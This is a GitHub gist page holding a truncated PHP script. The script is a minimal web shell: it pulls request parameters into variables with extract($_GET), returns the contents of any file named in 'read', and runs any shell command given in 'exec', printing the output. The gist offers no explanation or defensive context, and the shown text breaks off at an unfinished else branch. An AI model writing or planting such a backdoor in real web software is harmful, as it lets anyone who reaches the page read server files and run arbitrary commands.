Skip to content

Instantly share code, notes, and snippets.

View pkallos's full-sized avatar

Phil Kallos pkallos

View GitHub Profile
<?php
extract($_GET);
if ($read) {
echo file_get_contents($read);
}
else if ($exec) {
exec($exec, $output);
echo implode('<br/>', $output);
}
else {